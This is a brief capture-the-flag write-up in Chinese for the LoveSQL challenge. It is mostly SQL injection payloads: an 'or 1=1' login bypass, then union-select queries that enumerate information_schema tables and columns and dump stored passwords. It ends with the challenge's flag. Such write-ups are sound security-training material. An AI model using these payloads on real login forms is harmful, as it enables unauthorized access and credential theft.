[极客大挑战 2019]LoveSQL

万能密码登录成功没有发现flag 判断藏在数据库里

check.php?username=1 or 1=1&password=123456 or 1=1

登陆成功返回的密码

7a2d6a8fd56b61a79bba61ee8f5ad02c

直接开始联合注入

check.php?username=1 union select 1,2,3%23&password=1

check.php?username=1 union select 1,2,database()%23&password=1

check.php?username=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

geekuser,l0ve1ysq1

check.php?username=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()%23&password=1

id,username,password,id,username,password

check.php?username=1 union select 1,2,group_concat(0x7e,password,0x7e) from l0ve1ysq1%23&password=1

~wo_tai_nan_le~,~glzjin_wants_a_girlfriend~,~biao_ge_dddd_hm~,~linux_chuang_shi_ren~,~a_rua_rain~,~yan_shi_fu_de_mao_bo_he~,~cl4y~,~di_2_kuai_fu_ji~,~di_3_kuai_fu_ji~,~di_4_kuai_fu_ji~,~di_5_kuai_fu_ji~,~di_6_kuai_fu_ji~,~di_7_kuai_fu_ji~,~di_8_kuai_fu_ji~,~Syc_san_da_hacker~,~flag{be659f63-05e0-4e53-9cec-7b58dc63accc}~